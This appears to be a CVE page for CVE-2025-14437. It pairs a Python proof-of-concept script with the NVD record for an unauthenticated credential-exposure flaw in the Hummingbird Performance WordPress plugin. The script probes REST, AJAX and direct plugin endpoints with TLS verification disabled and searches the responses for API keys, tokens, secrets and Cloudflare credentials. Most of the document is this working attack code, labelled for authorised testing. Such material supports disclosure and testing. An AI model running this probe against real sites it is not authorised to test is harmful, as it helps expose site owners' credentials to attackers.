CVE-2025-14437

#!/usr/bin/env python3 # CVE-2025-14437 PoC - Hummingbird Performance Plugin Information Disclosure # Author: Security Research # Note: For authorized security testing only import requests import json import sys from urllib.parse import urljoin def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-14437""" # Try multiple attack vectors attack_vectors = [ # REST API endpoint '/wp-json/hummingbird/v1/request', # AJAX endpoint '/wp-admin/admin-ajax.php?action=hummingbird_api_request', # Direct plugin endpoint '/wp-content/plugins/hummingbird-performance/api/request.php' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } for vector in attack_vectors: try: url = urljoin(target_url, vector) response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for sensitive information in response if response.status_code == 200: # Look for API keys, tokens, or credentials keywords = ['cloudflare', 'api_key', 'api_key', 'secret', 'token', 'credential'] response_lower = response.text.lower() for keyword in keywords: if keyword in response_lower: print(f'[+] VULNERABLE! Found sensitive data via {vector}') print(f'[+] Response contains: {keyword}') print(f'[+] Status: {response.status_code}') return True except requests.RequestException as e: print(f'[-] Error testing {vector}: {e}') continue print('[-] Target may not be vulnerable or is patched') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-14437-poc.py <target_url>') print('Example: python cve-2025-14437-poc.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Testing {target} for CVE-2025-14437') check_vulnerability(target)

{"cve": {"id": "CVE-2025-14437", "sourceIdentifier": "[email protected]", "published": "2025-12-18T13:15:47.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hummingbird Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.18.0 via the 'request' function. This makes it possible for unauthenticated attackers to extract sensitive data including Cloudflare API credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8755ab3f-ee77-44ea-8620-590f1f1cb333?source=cve", "source": "[email protected]"}]}}